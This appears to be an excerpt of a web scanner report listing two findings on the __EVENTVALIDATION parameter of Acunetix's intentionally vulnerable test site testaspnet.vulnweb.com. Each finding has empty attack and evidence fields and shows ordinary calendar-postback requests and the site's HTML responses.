Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8149&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAIWCFJdoIZGRk1zaIBBSl2Tfr%2BQVH%2Bh%2BAjxNyc4Y%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKp4LOXDgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPSV5xdvML3wti2fc5FxFAXb2uuPo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:27 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAIWCFJdoIZGRk1zaIBBSl2Tfr+QVH+h+AjxNyc4Y=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKp4LOXDgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPSV5xdvML3wti2fc5FxFAXb2uuPo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:White" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8191&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAelWGRtoIZGRk%2Bpbh8o1y8E6arxTvhzZcjAQz2eU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKP9Zm5CQK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w92FlhFV8nha4J6xrpoVOfQMJeJEg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:04 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAelWGRtoIZGRk+pbh8o1y8E6arxTvhzZcjAQz2eU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP9Zm5CQK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w92FlhFV8nha4J6xrpoVOfQMJeJEg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:White" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
